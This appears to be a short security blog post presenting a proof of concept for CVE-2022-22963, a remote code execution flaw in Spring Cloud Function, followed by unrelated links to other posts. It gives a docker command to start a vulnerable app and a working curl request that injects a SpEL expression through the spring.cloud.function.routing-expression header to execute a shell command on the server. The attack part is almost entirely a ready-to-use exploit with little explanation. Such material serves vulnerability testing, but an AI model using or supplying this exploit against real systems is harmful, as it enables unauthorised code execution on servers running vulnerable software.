Kali Linux

CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

CVE-2022-22963 is to run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example:

docker run -it -d -p 8080:8080 bobcheat/springboot-public

Exploit

Curl command:

curl -i -s -k -X $’POST’ -H $’Host: 192.168.1.2:8080′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\”touch /tmp/test”)’ –data-binary $’exploit_poc’ $’http://192.168.1.2:8080/functionRouter’

Or using Burp suite:

Download
R K

Leave a Comment
Share
Published by
R K
Tags: CVE-2022-22963Java Frameworkremote code execution
4 years ago

Recent Posts

How To Use Variables In Bash Scripts

Introduction Variables are one of the most important basics of Bash scripting. A variable is…

9 hours ago

How To Run A Bash Script In Linux Step By Step

Introduction Running a Bash script in Linux is a basic but important skill for anyone…

9 hours ago

How To Write Your First Bash Script In Linux Step By Step

Introduction Writing your first Bash script in Linux is one of the best ways to…

9 hours ago

Install Docker on Ubuntu 24.04 With Easy Setup Guide

Docker has become one of the most important tools in modern software development. If you…

10 hours ago

APT Command Linux: Essential Package Management Guide

The APT Command Linux users rely on is one of the most powerful tools for…

13 hours ago

Install RPM on Ubuntu: Easy Guide to Run RPM Packages

Ubuntu users usually install software through .deb packages or the APT package manager. However, some…

16 hours ago